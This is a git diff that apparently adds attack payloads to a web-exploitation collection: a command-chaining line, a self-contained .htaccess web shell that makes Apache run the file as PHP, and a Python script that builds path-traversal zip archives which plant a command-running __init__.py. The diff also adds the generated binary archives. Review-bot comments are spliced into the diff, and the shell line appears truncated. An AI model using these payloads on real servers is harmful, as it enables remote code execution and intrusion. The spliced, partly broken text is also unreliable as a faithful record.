diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 8a68054..3ffd7b1 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -17,6 +17,7 @@ Commands execution by chaining commands
 original_cmd_by_server; ls
 original_cmd_by_server && ls
 original_cmd_by_server | ls
+original_cmd_by_server || ls Only if the first cmd fail
 ```
 
 Commands execution inside a command
diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/PHP .htaccess/.htaccess
new file mode 100644
index 0000000..9abc36b
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/.htaccess
@@ -0,0 +1,14 @@
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md
new file mode 100644
index 0000000..719aff3
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/README.md
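Review bot: The header comments of the new `.htaccess` file say what the file is but not which server setting it depends on or how to block it, which is what a defender reading this repository needs. A comment such as `# Mitigation: set AllowOverride None for upload directories and reject uploaded file names that start with ".ht"` above the `AddType` line would cover that. The existing comment also has two typos, `This occur` and `directoves`, which should read `This occurs` and `directives`.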
@@ -0,0 +1,27 @@
+# .htaccess upload
+Uploading an .htaccess file to override Apache rule and execute PHP.
+"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
+
+
+Self contained .htaccess web shell
+```
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
+```
+
+
+## Thanks to
+* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
new file mode 100644
index 0000000..69f89c5
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
new file mode 100644
index 0000000..4eef395
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip
new file mode 100644
index 0000000..61e0f11
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
new file mode 100644
index 0000000..7e7f015
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-generate-init.py b/Upload insecure files/Python __init__.py/python-generate-init.py
new file mode 100644
index 0000000..d1efac0
--- /dev/null
+++ b/Upload insecure files/Python __init__.py/python-generate-init.py
@@ -0,0 +1,19 @@
+# Generating "evil" zip file
+# Based on the work of Ajin Abraham
+# Vuln website : https://github.com/ajinabraham/bad_python_extract
+# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
+
+# Warning 1: need a restart from the server OR debug=True
+# Warning 2: you won't get the output of the command (blind rce)
+import zipfile
+
+directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
+for d in directories:
+ name = "python-"+d+"-__init__.py.zip"
+ zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
+ zipf.close()
+ z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
+ z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
+ z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
+ z_info.external_attr = 0777 << 16L
+ z_file.close()
diff --git a/Upload insecure files/Python __init__.py/python-login-__init__.py.zip b/Upload insecure files/Python __init__.py/python-login-__init__.py.zip
new file mode 100644
index 0000000..5f67036
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-login-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip
new file mode 100644
index 0000000..75c2e0f
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
new file mode 100644
index 0000000..47e5e5e
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip differ
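Review bot: The loop in `python-generate-init.py` opens each archive twice, and the first `zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)` / `zipf.close()` pair is dead code, because the later `zipfile.ZipFile(name, mode="w")` truncates the file and writes the entry without that compression setting. `0777 << 16L` uses Python 2-only literals and does not parse on Python 3; `0o777 << 16` parses on both. `z_info.external_attr` is assigned after `writestr`, so it presumably only takes effect because the central directory is written at `close()`; assigning it before the `writestr` call would make that explicit. The header comments would serve defenders better with one line naming the server-side flaw under test, for example `# Target flaw: archive extraction that does not verify each member path resolves inside the destination directory`. The thirteen `.zip` files added alongside are outputs of this script and cannot be inspected in review, so consider generating them on demand instead of committing them.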
diff --git a/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip b/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip
new file mode 100644
index 0000000..a2bbe3b
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip b/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
new file mode 100644
index 0000000..4ea8d06
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
new file mode 100644
index 0000000..ebca369
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
new file mode 100644
index 0000000..13b89ed
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
new file mode 100644
index 0000000..3622020
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip
new file mode 100644
index 0000000..29ed3a0
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip differ